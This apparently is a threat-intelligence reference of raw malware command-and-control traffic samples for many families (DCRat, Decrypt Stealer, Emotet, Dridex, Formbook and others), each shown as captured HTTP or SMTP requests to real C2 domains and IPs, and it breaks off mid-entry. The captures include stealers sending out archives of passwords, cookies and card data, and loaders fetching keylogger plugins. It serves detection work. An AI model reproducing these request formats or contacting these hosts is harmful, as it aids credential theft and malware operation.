/ksezblxlvou3kcmbq8l7hf3f4cy5xgeo4udla91dueu3qa54/46kqbjvyklunp1z56txzkhen7gjci3cyx8ggkptx25i74mo6myqpx9klvv3/akcii239myzon0xwjlxqnn3b34w/212bad81b4208a2b412dfca05f1d9fa7.php?type=__ds_setdata&__ds_setdata_user=552b13e67562d7b564b8a0ac9f35c735d17c786b&__ds_setdata_ext=2dce65292845e5dbc41d772bf7f1866e&__ds_setdata_data=%3CSTR%3Esmss.exe%3CSTR%3Esvchost.exe%3CSTR%3Ewinlogon.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Ecsrss.exe%3CSTR%3Esvchost.exe%3CSTR%3Elsm.exe%3CSTR%3Eqemu-ga.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Eexplorer.exe%3CSTR%3ESearchProtocolHost.exe%3CSTR%3Elsass.exe%3CSTR%3Ectfmon.exe%3CSTR%3Edwm.exe%3CSTR%3Ecsrss.exe%3CSTR%3Esvchost.exe%3CSTR%3Eservices.exe%3CSTR%3EWmiPrvSE.exe%3CSTR%3Ewininit.exe%3CSTR%3Espoolsv.exe%3CSTR%3Efsdffc.exe%3CSTR%3ESearchIndexer.exe%3CSTR%3ESearchFilterHost.exe%3CSTR%3Ewindanr.exe%3CSTR%3Esvchost.exe%3CSTR%3Esvchost.exe%3CSTR%3Etaskeng.exe%3CSTR%3ESystem.exe%3CSTR%3Esvchost.exe%3CSTR%3EIdle.exe HTTP/1.1 Host: domalo.online ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dcrat.png "DCRat") #### Decrypt Stealer ~~~ POST /gate.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accepts-Language: en-us,en;q=0.5 Content-Type: multipart/form-data; boundary=---------------------------8d7f030923bcd86 Host: geroipanel.site Content-Length: 1282596 Expect: 100-continue Connection: Keep-Alive -----------------------------8d7f030923bcd86 Content-Disposition: form-data; name="platform" 0 -----------------------------8d7f030923bcd86 Content-Disposition: form-data; name="profile" 0 -----------------------------8d7f030923bcd86 Content-Disposition: form-data; name="cccount" 0 -----------------------------8d7f030923bcd86 Content-Disposition: form-data; name="fcount" 0 -----------------------------8d7f030923bcd86 Content-Disposition: form-data; name="ccount" 0 -----------------------------8d7f030923bcd86 Content-Disposition: form-data; name="logs"; filename="bVYyP5uHP5ea.zip" Content-Type: zip PK.........l.P................Desktop Files\PK.........l.P............ ...Passwords.txtPK.........l.P............0...Browsers\AutoFill\Unknown_Microsoft_Autofill.txtPK.........l.P............1...Browsers\Cards\Unknown_Microsoft_Credit_Cards.txtPK.........l.P............2...Browsers\Cookies\Default_Google_Chrome_Cookies.txtPK.........l.P............5...Browsers\Cookies\qldyz51w.default_Firefox_Cookies.txtPK.........l.Pz7q)............Browsers\Cookies\Unknown_Microsoft_Cookies.txt..1..0.... ..........bA.Q....4.)....t.!.-..1.^.e.. {....E..%Q..G.P.F...t)...z.. Mp{.%C..........6...!.L....<...........F.>W.PD...07....>.T_@..........PK.........l.P ^..~...C...4...Browsers\Cookies\Unknown_Steam_htmlcache_Cookies.txt..A .0.E...J.I.8..[. .N..8%.(xz........{<-....1..p...H2.8)....YD.w. ..92.,.r.{.........L..?...aP./O..;@.(N.X.!.....5...\...v?.PK........2.)M..*.....>.......FileZilla\filezilla.xml.Yko.:......?..I...E..4Iw...........D[l(R.);.....%9N....v, ...Skype\CURRENT.u..ts ..5..C..PK.........p.M............ ...Skype\LOCKPK.........~)Ma...d....... ...Skype\LOG320..7.."]CS+S ..3.4P022.P.J--..KW.u..ts .Q.I-K.II.. ....!..VS.a.$........OWP64.............`...@B\.PK.........w.M`.6......... ...Skype\LOG.old.._K.0....)..Qko.$............v.1..h.....vC$+..-..;..pdI.I.a...RG..s.L..l...Ij..:JN...4....PK.........v.M........5.......Skype\MANIFEST-000001.Z.....#.TNjYjNJ..SeIjyfq.s~nAbQbI~...3......9!..L,...l,..L./..D|]C...2sR........ .*..X.]Y.Z..X\.XP..X...........Z.... ...H...h4..hN..........Q).nt0.... ......2..h....;... h&..7.A."......$>.I. .x.o@3I.......[..2I.h....;....h&..p..D>?...&.I.,Z..............A..Q.=zX...aZ. .PK...........l.P..............................Desktop Files\PK...........l.P............ .............,...Passwords.txtPK...........l.P............0.............W...Browsers\AutoFill\Unknown_Microsoft_Autofill.txtPK...........l.P............1.................Browsers\Cards\Unknown_Microsoft_Credit_Cards.txtPK...........l.P............2.................Browsers\Cookies\Default_Google_Chrome_Cookies.txtPK...........l.P............5.............D...Browsers\Cookies\qldyz51w.default_Firefox_Cookies.txtPK...........l.Pz7q)..........................Browsers\Cookies\Unknown_Microsoft_Cookies.txtPK...........l.P ^..~...C...4.............y...Browsers\Cookies\Unknown_Steam_htmlcache_Cookies.txtPK..........2.)M..*.....>.................I...FileZilla\filezilla.xmlPK..........1.)M..p.L.....................N...FileZilla\layout.xmlPK...........l.P...E_6..j.....................Images\Screenshot.pngPK...........l.P..........................^C..Images\Webcam.pngPK...........l.Pr..........................C..OutLook\OutLook.txtPK...........q.M!$...r..i..................C..Skype\000005.ldbPK............)MpCM..[........................Skype\000017.logPK...........v.M.i...s..o.................1...Skype\000018.ldbPK...........p.M.r.......... ............. ...Skype\CURRENTPK...........p.M............ .............Z...Skype\LOCKPK...........~)Ma...d....... .................Skype\LOGPK...........w.M`.6......... ............. ...Skype\LOG.oldPK...........v.M........5.................=...Skype\MANIFEST-000001PK.................... -----------------------------8d7f030923bcd86-- ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/decryptstealer1.png "Decrypt Stealer") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/decryptstealer2.png "Decrypt Stealer") #### Delf Loader ~~~ GET /gate.php?serial=MTc4NS02NDU5LTQ2NDktMjQ0NA== HTTP/1.1 Content-Type: text/html User-Agent: License Host: ddhook.000webhostapp.com Cache-Control: no-cache HTTP/1.1 200 OK Date: Mon, 07 Oct 2019 10:36:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: db10cf7bfe6a5d2a490182a808ccb458 11d091d035fb3bd27625c54c622a7e48 GET /check.php?serial=MTc4NS02NDU5LTQ2NDktMjQ0NA== HTTP/1.1 Content-Type: text/html User-Agent: License Host: ddhook.000webhostapp.com Cache-Control: no-cache HTTP/1.1 200 OK Date: Mon, 07 Oct 2019 10:36:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Server: awex X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 4f25a2a515ae727693adbe820cf36edd bff12793b8731a7f138e454a576ed1b5 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/delf.png "Delf Loader") #### Diamondfox ~~~ GET /plugins/keylogger.p HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: exploit.rocks Connection: Keep-Alive I..Dw..o.............?."..zoh:.X4.O..CCUT:WV.HF7#.h......zE...:oj'vV..>X ..O..&?.x..a.s.l.A1....D.... loU....G^......l.:.....u.......8..Lq[..N`.]...n..Qy...Q.nn.........}eF.C...;N9.lI@P.f.}g.....V~.lf>)...T..@.(..c-V..yOOe.....6.L/.D...~...p. GET /plugins/ftp.p HTTP/1.1 User-Agent: vb wininet Host: exploit.rocks HTTP/1.1 200 OK Date: Mon, 22 Apr 2019 19:53:57 GMT Server: Apache Last-Modified: Sun, 19 Jul 2015 09:20:08 GMT ETag: "15e0360-4000-51b36ed5c8200" Accept-Ranges: bytes Content-Length: 16384 Vary: Accept-Encoding,User-Agent Content-Type: text/x-pascal ..)..7C4J=K9..H;.#W R!W%.*\/]/[,f.c.a.`.i.o.j.o.u.t.u.s.~ { ..x..l.~....,. 3.^_...3.c w.x.?.{.q.QrF2.%V:.4Eym.{{\,S%.L:O.JO;J>..........................................................................................................................rrrrw.3G6B6@5AJ>H=I$P V'S"V*\)](\7C4N=K9I>H;Q#W R!W%]*\/]/[,f.c.a.`.i.o.j.o.u.t.u.s.~ ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/diamondfox.png "Diamondfox") #### Dodgerblue ~~~ MAIL FROM: 250 OK RCPT TO: 250 Accepted DATA 354 Enter message, ending with "." on a line by itself thread-index: AdeYjY9JWfNpH2aQRTCt4pdvmqBa0w== Thread-Topic: Passwords:::JOHNS-PC\cep2solilJZGK From: "abadia firmhearted" To: Subject: Passwords:::JOHNS-PC\cep2solilJZGK Date: Mon, 23 Aug 2021 19:13:00 -0700 Message-ID: <870B54DC128A4D2CADAF814D7EBD6F47@SXQUR6787287963> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0000_01D79852.E3EBF170" X-Mailer: Microsoft CDO for Windows 2000 Content-Class: urn:content-classes:message Importance: normal Priority: normal X-MimeOLE: Produced By Microsoft MimeOLE V6.1.7601.17514 This is a multi-part message in MIME format. ------=_NextPart_000_0000_01D79852.E3EBF170 Content-Type: text/plain Content-Transfer-Encoding: 7bit Date: 2021-08-23 7:12:48 PM System: Microsoft Windows NT 6.1.7601 Service Pack 1 (64 Bit) Username: cep2solilJZGK CompName: SXQUR6787287963 Windows Version: Microsoft Windows 7 Professional - 64-bit Antivirus: Not installed CPU: Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz GPU: Standard VGA Graphics Adapter RAM: 2004MB Internal IP: 192.168.180.141 External IP: 104.244.72.168 Date: 2021-08-23 7:12:49 PM System: Microsoft Windows NT 6.1.7601 Service Pack 1 (64 Bit) Username: cep2solilJZGK CompName: SXQUR6787287963 Windows Version: Microsoft Windows 7 Professional - 64-bit Antivirus: Not installed CPU: Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz GPU: Standard VGA Graphics Adapter RAM: 2004MB Internal IP: 192.168.180.141 External IP: 104.244.72.168 ------=_NextPart_000_0000_01D79852.E3EBF170 Content-Type: text/plain; name="credentials.txt" Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="credentials.txt" ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dodgerblue.png "DodgerBlue") #### Donotgroup ~~~ POST /ze/volad/uzi HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3) Host: skillsnew.top Content-Length: 1265 Cache-Control: no-cache data=oowJkdfLibIHB1Y62ffb2Cf5imwjN2x/vp1AE/SF8E9/fX1cnZaC6Bg7jRETqi6iAsAVATepyhSETB+r2H2rYWEvvx/SmugiXvz27uz0yReYJAkt5CqsQ1ydb5UHNRcWeCnGPQpjtxUSdy2LbDj+BHjBdjchVAB23Cz4rjuoSeMKlJRQ9zvCOr97/MMALs/TboDUd+5fj/i2/APrZTfpizOy8v+poMBVcVMSRXHmpqpemivoTJEMmTx7y5tGBeY2YbMpVycCDNMyaJr7Xuh3Bng2MVZ5/OO2jvfqFXqwiMMZtiBEpRGjCKGYsUb/J2cyOMtemC3Sh71GkfSpI1sSV+1rKJzBILo6VHTGPK0Z12dxKVXEUCn4KTUTo/QVWTCnCyL7r+b0BIL+SVXjBOGtamQqja1Hq0Hrihoulr6qYy0jDKiyDa9n9BkSO3AJXsx5IkMf0qQvKzMW3iWvcRmILL1AXRCGgsxFCvAcDZ9GV5jM7E6rXEYQcYATyePeWJIMnNO6Tvyn/4qcywkEiKwt8Uoe6YCGaEwZjIsWfhFHTyJXj4KUY7nUuArbF1iz029U2QErLL5AiQUpHYeddGkjkvEPRnwahESDpYAwS6dVEKCn/n4CMJHEJqxHNRA2uSEewoCBYQb1lsKfdiMFZvD1kzKaxR7Oeluch5UFAGEhbJQMC6PsyVQ1nna6bn2S/0Bc4tKsMXfkr3YdfrPrXjUu4PlMRYPQYFUKTTpsFyAHXQ4a5jaiW9PmZOx1Iej9I0aFIiF8e1nVYgNXmMO3pYYbKxW0sn/MswbPNeNs3vQVFma15AM3y7eK8sPPizvYTsG6ld8rW0aUNqidEfpvck50hpUDKH0RdcfT9u+Kw5NZJ99ebBO8DMc1q4/8l9Tb887feKC1bvRVS2JYZKSyDaLJtC7VYZLjtczdqtu5Ayrh3q8kvWFxneIVI9jBuYi5YSkH+F7YQ/yuiDZwtGw6USUejEOuIpfa0PSIJQkDf01AqeKrXcNtKnmjv51Kmu1Go5u0v/zPgWDNG6w3DH0UhWrZxodJwLuKx6Qu66p3Vww/XJcQwVIK+86StKqMcCBH44nE11jRVZNi8L5Ru6WWvVqtktYlOJAJq9T/0Y3O7Onac3fDTThRSkme8mpvzCbkVhTW3jG9h+8aKt2H5rpgrb+4oSfCZQh+V+zDE54I2ODNytc79YOHTdrxYgEG3K2wS4udvyG6t66FA8RUJqmMc+ZPSGk9ZDH0hKpA5iWAr06IGlo= ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/donotgroup.png "Donotgroup") #### Dridex (loader) ~~~ GET /function.php?3b3988df-c05b-4fca-93cc-8f82af0e3d2b HTTP/1.1 Host: masteronare.com Connection: Keep-Alive HTTP/1.1 200 OK Server: nginx Date: Tue, 05 Nov 2019 20:32:12 GMT Content-Type: application/octet-stream Content-Length: 455830 Connection: keep-alive Keep-Alive: timeout=60 Accept-Ranges: bytes Content-Disposition: attachment; filename=5dc1dc4cd884c.pdf 7Y2FGZnZ2enZ2dnZydnZ2dhgYD3Z2e1B2dnZ2dnZ2dnZmdnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnYPdnZ2dnYDUUJQA3ZDdll5flVQdWN6B19hcF9HVE51QFRaDllUWnFDfnB5X1VaAkFTdHVebWR1TlNgA1BWYANQZXIOY35wBkFtcGJCc2YHfH12dnZ2dnZ2dnZ1XxxRchx9bV5RVWRgblkFB1tafQ5DdlsAXlVjBW5ZBQd0b0FxQ3J9XlFVZn1SD1oFQ1p9DkMCR1F0VWRGblkFB1tafQJDX31eUVVmfVIAYAdcWn0OQ3ZbAFtVZGRuWQUHdG9CeUN9fV5RVWZ9UgIFB1xafQ5DYlpbXVZ0YG5ZBQd2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZicmJ2dnJAdXV2dXJRenFTdnZ2dnZ2dnZ2dnNQdnZ+X3RAcn52dnRAdkB2dlh9cn ~~~ ~~~ POST / HTTP/1.1 Host: 194.99.22.193 Content-Length: 3442 Connection: Close Cache-Control: no-cache ..5......[,h?])moo..;.Y.. v..jq..........G.0vR...@ ..6tw..<.{It.y #l.K..8....v...v......=.+.......Q..v..P5...y...uhTqR. ..v.QoM..o.I.l...>.....p.....Rt............... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dridex.png "Dridex") #### Dunihi ~~~ POST /is-ready HTTP/1.1 Accept: */* Accept-Language: en-us User-Agent: C4BA3647<|>USER-PC<|>admin<|>Microsoft Windows 7 Professional <|>+<|>undefined<|>false - 20/9/2019 Accept-Encoding: gzip, deflate Host: 192.186.145.93:8885 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache HTTP/1.1 200 OK Connection: close Content-Type: text/html Server: Indy/9.0.18 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/dunihi.png "Dunihi") #### Emotet ~~~ POST /mult/tlb/ HTTP/1.1 Referer: http://69.162.169.173/mult/tlb/ Content-Type: application/x-www-form-urlencoded DNT: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 69.162.169.173:8080 Content-Length: 468 Connection: Keep-Alive Cache-Control: no-cache 5Grps=L1sIwg4a7XWGwPpN9LOBzMiBXsZTP33ixo%2FUspmgBLoaYr0K7KnwvoUER9%2B5NzIxpTHgpSTeVRZMm92wSA%2Ff9pG66uhR%2FX%2BGREn%2BVIvlr3LiYQupDVsdexmgD%2FSXdTJ%2FxXNSo5Q52S4HvI9eLtM9s0arCw%2FNNEZlkzp6e8omxU3854YNNNUcAV54N30rgISrXlxvWJz9TP%2FelEcMxMf3hzv91K1Uz8H2KWzWjV2x78pmAG9HGdkFGLaOq6Tqp1LH6Uc7c1gzmZ3Cht2T4cKg06DPDTHkXYj%2F7uCMWAFMO%2FS4QlZl1XKi8MmZck0JAmxsZdGcmIkQoqq5DzFCio6fUAgvqUN3g1%2BP5eXYeZpGu1xIzbWLRG9Wtt2vUOjz4ezl6Z%2B2peN1LKWN%2F8V0CLjxQHhXSu9YZP4g3NIdJ5qofLmM0ipT HTTP/1.1 200 OK Server: nginx Date: Mon, 07 Oct 2019 13:38:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 148 Connection: keep-alive .^ta.I..Z .._AJ*..=._...5-...F.L{>...`.c.....~.|.h...@.E...2.Z|U..W..M....b......X.FA....x.....\.j?/C......{pi.b....Cz......>D..yQ........G.q...4?.. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/emotet-1.png "Emotet") ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/emotet-2.png "Emotet") #### EngrWiz ~~~ POST /b.php?79 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: litespidchk.tk Content-Length: 970 Expect: 100-continue main1=bNzJOjMPRRDJ2ylFA1SCAY7GEg0j4ROaetEMhuN1ObuzyJ%2bYF2etM938iapA5dT909gUM9ORgU5n0fMY%2fFKhRr7QWxNopqIoNFeQWjzRaqyGtXxs5NLSLHAitCOyzowy&back=TnpNNU5DMUJNamRETFRnMk9VVXRRVEpEUXkwM016WXpMVE00TXprdFFqTXlNaTA0TXpCRE96VHA%3d&main3=NTQ%3d&main2=Gr4YoYDefbNT%2ftg2inQcbufFo%2bzbKZmaqrttK%2fVrQXhuPh9fr66Kem9y7I%2bsUHvrnrmSNogQl3Lk%2bMvr9p8aGKsZrSODSSTbYPy3Osy5WF8reN7lc6V%2fUtARI%2bizcbulBVnqc3zLaKOvIEl8eDqq6mbY5GwzG3Mie6NW5W1zLG3hEmABLyZkbQdJhhkYhMpQbxkuIhbcIzdTSm9%2b4xC8gb9v%2bnRligpWZowXrb56VqPC9KrPYuBnIqHH4xj5Pwgyl1g8kDTLJ2qMfGIAZeFv4YuSM2Xuza%2bMN7Zpi8Uuxuvq1D9wsc7b8V4POHZ9Rn34alELER2wAdRQ7PiNI2sglwH97JsZoopUyW28YJOAFWJ6kDPKXKIpiUifcye%2b4wplt9fV3OycDqbt5gAbobpA7qNTgyQfAUXYrXMDRNhNQi4%2ffbWCt2%2fd%2bZd%2fxe9k55wQhhLbdy%2bn1wLkZz4NIGssu9vJECynDGwT%2f4MlFIwD5kV0hD%2bjjSTHecWF23%2f0Wi%2fCS7msiLCQ3SukIpWskjRPNPZ8TDvlYctblEeLUZWZDobBQgsdLUzCekYEsX4toOXF2NV69a3ayO0e8etiw4LPRrvbBQiAmU5FZYESOeWkaw71mxzjOxeHFPQtKn2%2fWwdxBpl05y5BtZSnOzfc2wCELk4iYCl20OE5OtjyGvhtAes%3dHTTP/1.1 200 OK Date: Wed, 24 Jul 2019 09:11:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d6917d65789c5d5e772089d4fe53cd4181563959469; expires=Thu, 23-Jul-20 09:11:09 GMT; path=/; domain=.litespidchk.tk; HttpOnly X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-ID: 571e4da59d69406a9d967ee31ad5fae4 Server: cloudflare CF-RAY: 4fb4c3dd683ccaf4-ARN ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/engrwiz.png "EngrWiz") #### Evilpony Follow tcp stream, not http stream in wireshark ~~~ POST /d2/about.php HTTP/1.0 Host: spausence.com Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 337 Content-Type: application/octet-stream Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Encoding: binary ...Q..8.T.f5...~....I..%..`qq...q.^.i.u..v.|34.../t....w....u.}........ 6....... ...2..T(.Z.X/..A....55.....>$l ..uE.-..p.. ..omvs.S.uYa.Y...............Ezv...B.OM_.X.pg..1...6..}kN..U..%...2.:.H.E......9.k.-.5sD..@.* k~........y.s.....@.L+X....wK.O11a.q.$.zd.A...hd9........,. ..(..tP..$.|rS....I.8" ..X!@. ....4N...x.<.......!m~O_.T`.HTTP/1.1 200 OK Server: nginx/1.10.3 Date: Thu, 03 Oct 2019 17:18:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.4.45 I6.$...Z,.... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/evilpony.png "Evilpony") #### Evrial Stealer ~~~ HTTP/1.1 100 Continue POST /files/upload.php?user=XakFor.Net&hwid=EEEB5D54788042A7B542739BBC26CF4B HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------8d7830f073b0ab4 Host: softfare.zzz.com.ua Content-Length: 58292 Expect: 100-continue Connection: Keep-Alive -----------------------8d7830f073b0ab4 Content-Disposition: form-data; name="file"; filename="sega2laj1y4.zip" Content-Type: application/octet-stream PK........W..O........M.......desktop.jpg..u\T].=:.4b. ....t."14CI..AH..H( #9t#0.. ) .!.J7. ...}.}.....?.....9s....a?.Y.z.yO..L...*!.`xxx.{.?..(L.FBDDLt................. ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/evrial.png "Evrial") #### Exilerat ~~~ POST /test/u HTTP/1.1 Cache-Control: no-store Connection: Keep-Alive Pragma: no-store Content-Type: multipart/form-data; boundary=--71h2ll4i66hhbl Accept: text/*,application/* Accept-Language: en-US,en Host: 27.126.188.212 Content-Length: 368 --71h2ll4i66hhbl Content-Disposition:form-data;name="x.bin" Content-Type:application/octect-stream cjESYTqBEdGqEeIxETEREaKiooqikgm6irKKgqKigimigikRMysrKz8jIyMrqhHi MRExERGioqKKopIJuoqyioKiooIpooIpETMbIyMjibkJsUqhOTsLIyMjKABIaFAD GyMjI6JSolKiUqIL2yMjI4qySoqCSqKiSoIpSqKCSikRquqyUqqS4lKqoqJS4qob kyMjI5loUABYmLgimiKQCLDyklKqUpqSoqpjBAMjIw== --71h2ll4i66hhbl-- ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/exilerat.png "Exilerat") #### Expiro ~~~ POST dovamnabihede.ws HTTP/1.1 User-Agent: Mozilla/4.0 (Compatible; msie 44; NT6.1.7601-90376708.ENU.3DA43F52-83C788-FF5FFC-15DD1711; .NET CLR 00000000/00000000) ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/expiro.png "Expiro") #### Filecoder.STOP ~~~ GET /As73yhsyU34578hxxx/SDf565g/get.php?pid=2485E9F082250E269EA0EF635E0D382D&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: ring1.ug HTTP/1.1 200 OK Date: Fri, 25 Oct 2019 13:26:11 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 562 Connection: close Content-Type: text/html; charset=UTF-8 {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5pjgODTtZORmS4jeVWQV\\nvs71Fz\/NH7IWyR7an0L+rLo1S7Jrqn64J8LXlT\/1eiDN87tYle5AlB4\/vmf4Uo98\\ncMG\/E+NbFLtyRyxTq4RmaNDjyvTPIXbBl+cMU4yIwBKT89D8tuD6PhdfVVjMx71l\\niEPtuNb5pD38EYGv\/3+Yrwvg3sU1+aiIWdZgPX3ieFxAL3ZZkvlr5\/XeNpKqGAiT\\n6YBjLZg7R\/5j5Knhex+gKUR2Gkh2CG7mWqjcaNUK9Hzkgk3\/UmqopxokpSTkHmUT\\nSlN5mKAg438TmIUz4MCnnieexOtpcg7Fmn2wPObgdIG3OXK5yfxxExa+TBDTbCFc\\ngQIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"Em9SPAhlG3hXHt713xEY92niynachhsXeWwCv6cB"} ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/stopfilecoder.png "Expiro") #### Fin7 JS Backdoor ~~~ POST /pictures/delete?type=name HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0 Content-Length: 326 Host: moviedvdpower.com lwirwavfynacqo=PKWFG%04S@XZ%16l%04%0E%00%02%00f%09%02%06%09%1EAC%04%0D%02%05%1FKVTK%5DG%0AX%08%07%0F%0D%00W%05%5B%5DQ%05%0D%0AV%0F%0B%5B%0B%03%0E%0FP%03%0B%01%06%0E%0C%5D%06V%1FLZZ%5C%05%02%05%09%08%03%07%1FMZS%04%0E%01%05%1FQW%0A%0C%0A%09%02%0D%02%03%07%03%0Cr%0Dx%7C%09%05%08gfD%5CJ%1Egz%1ECV%5E%5Dl%5E%5D%05%5DRN%26_%267983 HTTP/1.1 200 OK Server: nginx/1.12.2 Date: Tue, 15 Oct 2019 16:27:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive POST /new/new?type=name HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 Accept: */* Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0 Content-Length: 306 Host: moviedvdpower.com lwirwavfynacqo=PG_EG%08%5BCXV%1Eo%04%02%08%01%00j%01%01%06%05%16BC%08%05%01%05%13CUTGUD%0AT%00%04%0F%01%08T%05WUR%05%01%02U%0F%07S%08%03%02%07S%03%07%09%05%0E%00U%05V%13DYZP%0D%01%05%05%00%00%07%13EYS%08%06%02%05%13YT%0A%00%02%0A%02%01%0A%00%07%0F%04q%0Dtt%0A%05%04oeDPB%1Dgv%16@VRUo%5EQ%0D%5ERB%26_%267500 ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/fin7jsbackdoor.png "Fin7 JS Backdoor") #### Firebird RAT ~~~ 00000000 53 00 00 00 00 00 00 00 S....... 00000008 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 ........ ........ 00000018 00 06 01 00 00 00 3b 56 5c 5a 48 4b 05 67 66 3c ......;V \ZHK.gf< 00000028 22 0c 04 13 14 10 41 41 32 02 1c 06 08 06 2e 5b ".....AA 2......[ 00000038 5b 24 0c 1f 1a 5a 4d 59 61 50 32 15 01 0a 1f 5a [$...ZMY aP2....Z 00000048 29 53 56 2b 43 59 15 34 3d 3d 03 0c 3c 22 0c 04 )SV+CY.4 ==..<".. 00000058 13 14 0b ... ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/firebird.png "Firebird") #### Flawedammyy ~~~ = ..">h..K...t.......N<. .Q..1....%S-.8z...id=53292686&os=7 SP1 x86&priv=User+UAC&cred=USER-PC\admin&pcname=USER-PC&avname=&build_time=08-08-2019 14:24:35 PM&card=0& ~~~ ![alt text](https://github.com/silence-is-best/c2db/blob/master/images/flawedammyy.png "Flawedammyy") #### Formbook formbook hostnames are almost always www ~~~ POST /k9m/ HTTP/1.1 Host: www.liuhe127.com Connection: close Content-Length: 3769 Cache-Control: no-cache Origin: http://www.liuhe127.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.liuhe127.com/k9m/ Accept-Language: en-US Accept-Encoding: gzip, deflate 